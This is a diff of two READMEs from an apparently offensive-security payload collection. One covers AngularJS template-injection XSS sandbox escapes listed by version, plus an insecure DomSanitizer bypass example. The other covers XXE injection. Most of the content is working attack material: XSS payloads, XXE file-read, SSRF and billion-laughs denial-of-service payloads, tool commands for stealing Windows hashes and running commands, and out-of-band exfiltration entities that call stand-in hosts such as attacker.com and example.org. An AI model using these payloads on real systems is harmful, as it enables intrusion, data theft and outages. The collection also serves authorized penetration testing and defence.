-Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
+AngularJS 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
 
 ```javascript
 {{0[a='constructor'][a]('alert(1)')()}}
@@ -28,7 +30,7 @@ Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/105588761
 {{$on.constructor('alert(1)')()}}
 ```
 
-Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
+AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
 
 ```javascript
 {{
@@ -47,25 +49,25 @@ Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
 }}
 ```
 
-Angular 1.5.0 - 1.5.8
+AngularJS 1.5.0 - 1.5.8
 
 ```javascript
 {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
 ```
 
-Angular 1.4.0 - 1.4.9
+AngularJS 1.4.0 - 1.4.9
 
 ```javascript
 {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
 ```
 
-Angular 1.3.20
+AngularJS 1.3.20
 
 ```javascript
 {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
 ```
 
-Angular 1.3.19
+AngularJS 1.3.19
 
 ```javascript
 {{
@@ -74,7 +76,7 @@ Angular 1.3.19
 }}
 ```
 
-Angular 1.3.3 - 1.3.18
+AngularJS 1.3.3 - 1.3.18
 
 ```javascript
 {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
@@ -82,7 +84,7 @@ Angular 1.3.3 - 1.3.18
   $eval('x=alert(1)//');  }}
 ```
 
-Angular 1.3.1 - 1.3.2
+AngularJS 1.3.1 - 1.3.2
 
 ```javascript
 {{
@@ -92,7 +94,7 @@ Angular 1.3.1 - 1.3.2
 }}
 ```
 
-Angular 1.3.0
+AngularJS 1.3.0
 
 ```javascript
 {{!ready && (ready = true) && (
@@ -111,44 +113,44 @@ Angular 1.3.0
     );}}
 ```
 
-Angular 1.2.24 - 1.2.29
+AngularJS 1.2.24 - 1.2.29
 
 ```javascript
 {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
 ```
 
-Angular 1.2.19 - 1.2.23
+AngularJS 1.2.19 - 1.2.23
 
 ```javascript
 {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
 ```
 
-Angular 1.2.6 - 1.2.18
+AngularJS 1.2.6 - 1.2.18
 
 ```javascript
 {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
 ```
 
-Angular 1.2.2 - 1.2.5
+AngularJS 1.2.2 - 1.2.5
 
 ```javascript
 {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
 ```
 
-Angular 1.2.0 - 1.2.1
+AngularJS 1.2.0 - 1.2.1
 
 ```javascript
 {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
 ```
 
-Angular 1.0.1 - 1.1.5 and Vue JS
+AngularJS 1.0.1 - 1.1.5 and Vue JS
 
 ```javascript
 {{constructor.constructor('alert(1)')()}}
 ```
 
 
-## Blind XSS
+### Blind XSS
 
 1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53)
 
@@ -253,6 +255,47 @@ Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (Po
 }}
 ```
 
+## Automatic Sanitization
+
+> To systematically block XSS bugs, Angular treats all values as untrusted by default. When a value is inserted into the DOM from a template, via property, attribute, style, class binding, or interpolation, Angular sanitizes and escapes untrusted values.
+
+However, it is possible to mark a value as trusted and prevent the automatic sanitization with these methods:
+
+- bypassSecurityTrustHtml
+- bypassSecurityTrustScript
+- bypassSecurityTrustStyle
+- bypassSecurityTrustUrl
+- bypassSecurityTrustResourceUrl
+
+Example of a component using the unsecure method `bypassSecurityTrustUrl`:
+
+```
+import { Component, OnInit } from '@angular/core';
+
+@Component({
+  selector: 'my-app',
+  template: `
+    <h4>An untrusted URL:</h4>
+    <p><a class="e2e-dangerous-url" [href]="dangerousUrl">Click me</a></p>
+    <h4>A trusted URL:</h4>
+    <p><a class="e2e-trusted-url" [href]="trustedUrl">Click me</a></p>
+  `,
+})
+export class App {
+  constructor(private sanitizer: DomSanitizer) {
+    this.dangerousUrl = 'javascript:alert("Hi there")';
+    this.trustedUrl = sanitizer.bypassSecurityTrustUrl(this.dangerousUrl);
+  }
+}
+```
+
+![XSS](https://angular.io/generated/images/guide/security/bypass-security-component.png)
+
+When doing a code review, you want to make sure that no user input is being trusted since it will introduce a security vulnerability in the application.
+
 ## References
 
-- [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
\ No newline at end of file
+- [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
+- [Blind XSS AngularJS Payloads](https://ardern.io/2018/12/07/angularjs-bxss)
+- [Angular Security](https://angular.io/guide/security)
+- [Bypass DomSanitizer](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 9db48ac3..b12c8c7f 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -11,21 +11,80 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
 ## Summary
 
 - [Tools](#tools)
-- [Exploit](#exploit)
-- [Basic XXE](#basic-xxe)
-- [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
-- [Deny of service](#deny-of-service)
-- [Blind XXE - Out of Band](#blind-xxe---out-of-Band)
+- [Detect the vulnerability](#detect-the-vulnerability)
+- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files)
+  - [Classic XXE](#classic-xxe)
+  - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded)
+  - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
+  - [XInclude attacks](#xinclude-attacks)
+- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)
+- [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service)
+  - [Billion Laugh Attack](#billion-laugh-attack)
+- [Error Based XXE](#error-based-xxe)
+- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
+  - [Blind XXE](#blind-xxe)
+  - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
+  - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter)
+  - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf)
 - [XXE in exotic files](#xxe-in-exotic-files)
+  - [XXE inside SVG](#xxe-inside-svg)
+  - [XXE inside SOAP](#xxe-inside-soap)
+  - [XXE inside DOCX file](#xxe-inside-docx-file)
+  - [XXE inside XLSX file](#xxe-inside-xlsx-file)
 
 ## Tools
 
-- [xxeftp](https://github.com/staaldraad/xxeserv)
+- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads
   ```
-  sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555
+  sudo ./xxeftp -uno 443
+  ./xxeftp -w -wps 5555
+  ```
+- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/)
+  ```
+  $ python3 230.py 2121
+  ```
+- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
+  ```bash
+  # Enumerating /etc directory in HTTPS application:
+  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
+  # Enumerating /etc directory using gopher for OOB method:
+  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
+  # Second order exploitation:
+  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
+  # Bruteforcing files using HTTP out of band method and netdoc protocol:
+  ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
+  # Enumerating using direct exploitation:
+  ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
+  # Enumerating unfiltered ports:
+  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
+  # Stealing Windows hashes:
+  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
+  # Uploading files using Java jar:
+  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
+  # Executing system commands using PHP expect:
+  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
+  # Testing for XSLT injection:
+  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
+  # Log requests only:
+  ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
+  ```
+- [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)
+  ```
+  ruby server.rb
+  ```
+- [docem](https://github.com/whitel1st/docem) - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc
+  ```
+  ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx
+  ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place
+  ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place
+  ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx
+  ```
+- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities.
+  ```
+  python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs 
   ```
 
-## Exploit
+## Detect the vulnerability
 
 Basic entity test, when the XML parser parses the external entities the result should contain "John" in `firstName` and "Doe" in `lastName`. Entities are defined inside the `DOCTYPE` element.
 
@@ -40,9 +99,11 @@ Basic entity test, when the XML parser parses the external entities the result s
 
 It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
 
-## Basic XXE
+## Exploiting XXE to retrieve files
 
-Classic XXE, we try to display the content of the file `/etc/passwd` 
+### Classic XXE
+
+We try to display the content of the file `/etc/passwd` 
 
 ```xml
 <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
@@ -71,13 +132,22 @@ Classic XXE, we try to display the content of the file `/etc/passwd`
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
 ```
 
-Classic XXE Base64 encoded
+:warning: `SYSTEM` and `PUBLIC` are almost synonym.
+
+```xml
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [  
+  <!ELEMENT foo ANY >
+  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
+```
+
+### Classic XXE Base64 encoded
 
 ```xml
 <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
 ```
 
-## PHP Wrapper inside XXE
+### PHP Wrapper inside XXE
 
 ```xml
 <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
@@ -101,11 +171,34 @@ Classic XXE Base64 encoded
 <foo>&xxe;</foo>
 ```
 
-## Deny of service
+### XInclude attacks
 
-**Warning** : These attacks might kill the service or the server, do not use them on the production.
+When you can't modify the **DOCTYPE** element use the **XInclude** to target 
 
-Billion Laugh Attack
+```xml
+<foo xmlns:xi="http://www.w3.org/2001/XInclude">
+<xi:include parse="text" href="file:///etc/passwd"/></foo>
+```
+
+## Exploiting XXE to perform SSRF attacks
+
+XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network.
+
+```xml
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
+]>
+<foo>&xxe;</foo>
+```
+
+
+## Exploiting XXE to perform a deny of service
+
+:warning: : These attacks might kill the service or the server, do not use them on the production.
+
+### Billion Laugh Attack
 
 ```xml
 <!DOCTYPE data [
@@ -118,7 +211,7 @@ Billion Laugh Attack
 <data>&a4;</data>
 ```
 
-Yaml attack
+### Yaml attack
 
 ```xml
 a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
@@ -132,7 +225,30 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
 i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
 ```
 
-## Blind XXE - Out of Band
+
+## Error Based XXE
+
+**Payload to trigger the XXE**
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
+    %ext;
+]>
+<message></message>
+```
+
+**Contents of ext.dtd**
+```xml
+<!ENTITY % file SYSTEM "file:///etc/passwd">
+<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+%eval;
+%error;
+```
+
+
+## Exploiting blind XXE to exfiltrate data out-of-band
 
 Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
 
@@ -192,9 +308,9 @@ File stored on http://127.0.0.1/dtd.xml
 <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
 ```
 
-### XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788)
+### XXE OOB with Apache Karaf
 
-Affected versions:
+CVE-2018-11788 affecting versions:
 
 - Apache Karaf <= 4.2.1
 - Apache Karaf <= 4.1.6
@@ -213,15 +329,99 @@ Send the XML file to the `deploy` folder.
 
 Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
 
+
+## XXE with local DTD
+
+In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:
+```xml
+<!DOCTYPE root [<!ENTITY test SYSTEM 'http://h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net'>]>
+<root>&test;</root>
+```
+
+If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename.
+
+```xml
+<!DOCTYPE root [
+    <!ENTITY % local_dtd SYSTEM "file:///abcxyz/">
+
+    %local_dtd;
+]>
+<root></root>
+```
+
+Assuming payloads such as the previous return a verbose error. You can start pointing to local DTD. With an found DTD, you can submit payload such as the following payload. The content of the file will be place in the error message.
+
+```xml
+<!DOCTYPE root [
+    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
+
+    <!ENTITY % ISOamsa '
+        <!ENTITY &#x25; file SYSTEM "file:///REPLACE_WITH_FILENAME_TO_READ">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        '>
+
+    %local_dtd;
+]>
+<root></root>
+```
+
+[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
+
+
 ## XXE in exotic files
 
 ### XXE inside SVG
-```
+
+```xml
 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
     <image xlink:href="expect://ls"></image>
 </svg>
 ```
 
+**Classic**
+
+```xml
+<?xml version="1.0" standalone="yes"?>
+<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
+<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
+   <text font-size="16" x="0" y="16">&xxe;</text>
+</svg>
+```
+
+**OOB via SVG rasterization**
+
+*xxe.svg*
+
+```xml
+<!DOCTYPE svg [
+<!ELEMENT svg ANY >
+<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
+%sp;
+%param1;
+]>
+<svg viewBox="0 0 200 200" version="1.2" xmlns="http://www.w3.org/2000/svg" style="fill:red">
+      <text x="15" y="100" style="fill:black">XXE via SVG rasterization</text>
+      <rect x="0" y="0" rx="10" ry="10" width="200" height="200" style="fill:pink;opacity:0.7"/>
+      <flowRoot font-size="15">
+         <flowRegion>
+           <rect x="0" y="0" width="200" height="200" style="fill:red;opacity:0.3"/>
+         </flowRegion>
+         <flowDiv>
+            <flowPara>&exfil;</flowPara>
+         </flowDiv>
+      </flowRoot>
+</svg>
+```
+
+*xxe.xml*
+
+```xml
+<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://example.org:2121/%data;'>">
+```
+
 ### XXE inside SOAP
 
 ```xml
@@ -257,13 +457,64 @@ JPG (experimental)
 GIF (experimental)
 ```
 
+### XXE inside XLSX file
+
+Extract the excel file.
+
+```powershell
+$ mkdir XXE && cd XXE
+$ unzip ../XXE.xlsx
+Archive:  ../XXE.xlsx
+  inflating: xl/drawings/drawing1.xml
+  inflating: xl/worksheets/sheet1.xml
+  inflating: xl/worksheets/_rels/sheet1.xml.rels
+  inflating: xl/sharedStrings.xml
+  inflating: xl/styles.xml
+  inflating: xl/workbook.xml
+  inflating: xl/_rels/workbook.xml.rels
+  inflating: _rels/.rels
+  inflating: [Content_Types].xml
+```
+
+Add your blind XXE payload inside `xl/workbook.xml`.
+
+```powershell
+<xml...>
+<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
+<x>&xxe;</x>
+<workbook...>
+```
+
+Rebuild the Excel file.
+
+```powershell
+$ zip -r ../poc.xslx *
+updating: [Content_Types].xml (deflated 71%)
+updating: _rels/ (stored 0%)
+updating: _rels/.rels (deflated 60%)
+updating: docProps/ (stored 0%)
+updating: docProps/app.xml (deflated 51%)
+updating: docProps/core.xml (deflated 50%)
+updating: xl/ (stored 0%)
+updating: xl/workbook.xml (deflated 56%)
+updating: xl/worksheets/ (stored 0%)
+updating: xl/worksheets/sheet1.xml (deflated 53%)
+updating: xl/styles.xml (deflated 60%)
+updating: xl/theme/ (stored 0%)
+updating: xl/theme/theme1.xml (deflated 80%)
+updating: xl/_rels/ (stored 0%)
+updating: xl/_rels/workbook.xml.rels (deflated 66%)
+updating: xl/sharedStrings.xml (deflated 17%)
+```
+
+
 ## References
 
 * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
 * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
 * [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
 * [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
-* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
+* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
 * [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
 * [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html)
 * [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)
@@ -273,3 +524,9 @@ GIF (experimental)
 * [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html)
 * [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)
 * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
+* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
+* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
+* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
+- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
+- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
+- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)